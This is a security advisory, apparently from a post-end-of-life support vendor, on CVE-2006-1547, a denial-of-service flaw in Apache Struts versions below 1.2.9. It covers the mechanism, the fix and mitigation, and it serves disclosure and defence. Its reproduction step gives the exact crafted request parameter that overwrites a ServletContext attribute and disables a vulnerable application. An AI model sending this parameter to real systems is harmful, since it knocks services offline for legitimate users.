Overview
Apache Struts is a popular open-source web application framework for developing Java EE web applications. It provides robust support for creating modern Java-based enterprise applications.
A Denial of Service vulnerability (CVE-2006-1547) has been identified in Apache Struts, which allows attackers to manipulate input to cause a Denial of Service.
Per America’s Cyber Defense Agency, a denial-of-service attack occurs when legitimate users are unable to access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor. Services affected may include email, websites, online accounts (e.g., banking), or other services that rely on the affected computer or network. A denial-of-service condition is accomplished by flooding the targeted host or network with traffic until the target cannot respond or simply crashes, preventing access for legitimate users. DoS attacks can cost an organization both time and money while their resources and services are inaccessible.
This issue affects all versions of struts less than 1.2.9 with BeanUtils >=1.7.
Details
Module Info
- Product: Apache Struts
- Affected packages: struts, struts-core
- Affected versions: <1.2.9
- GitHub repository: https://github.com/apache/struts
- Package manager: Maven
- Fixed in: NES for Apache Struts Struts 1 v1.1.1
Vulnerability Info
ActionForms that handle multipart requests expose the MultipartRequestHandler through the form’s getMultipartRequestHandler() method. This handler, in turn, provides access to the ActionServlet and, ultimately, the ServletContext. By spoofing specially crafted request parameters, an attacker could set arbitrary attributes in the ServletContext during form population. For example, critical Struts configuration objects stored in the ServletContext could be replaced, potentially rendering the application inoperable.
Starting with Struts 1.2.9, the MultipartRequestHandler is only stored in the ActionForm after the form population has been completed. As a result, any malicious attempt to exploit this mechanism in a denial-of-service (DoS) attack will now cause a NestedNullException to be thrown by BeanUtils during form population.
Steps To Reproduce
On a vulnerable version of Struts, craft a request with a parameter named multipartRequestHandler.servlet.servletContext.attribute(org.apache.struts.action.MODULE) and assign it any text string as a value. The page will load successfully, but the application will no longer function properly. On a patched version of Struts, the application will continue to operate normally even after the attack is attempted.
Credit
- Bogdan Serban for responsibility reporting
- Henri Yandell for the patch
Mitigation
Users of the affected components should apply one of the following mitigations:
- Upgrade to patched version 1.2.9
- Leverage a commercial support partner like HeroDevs for post-EOL security support.
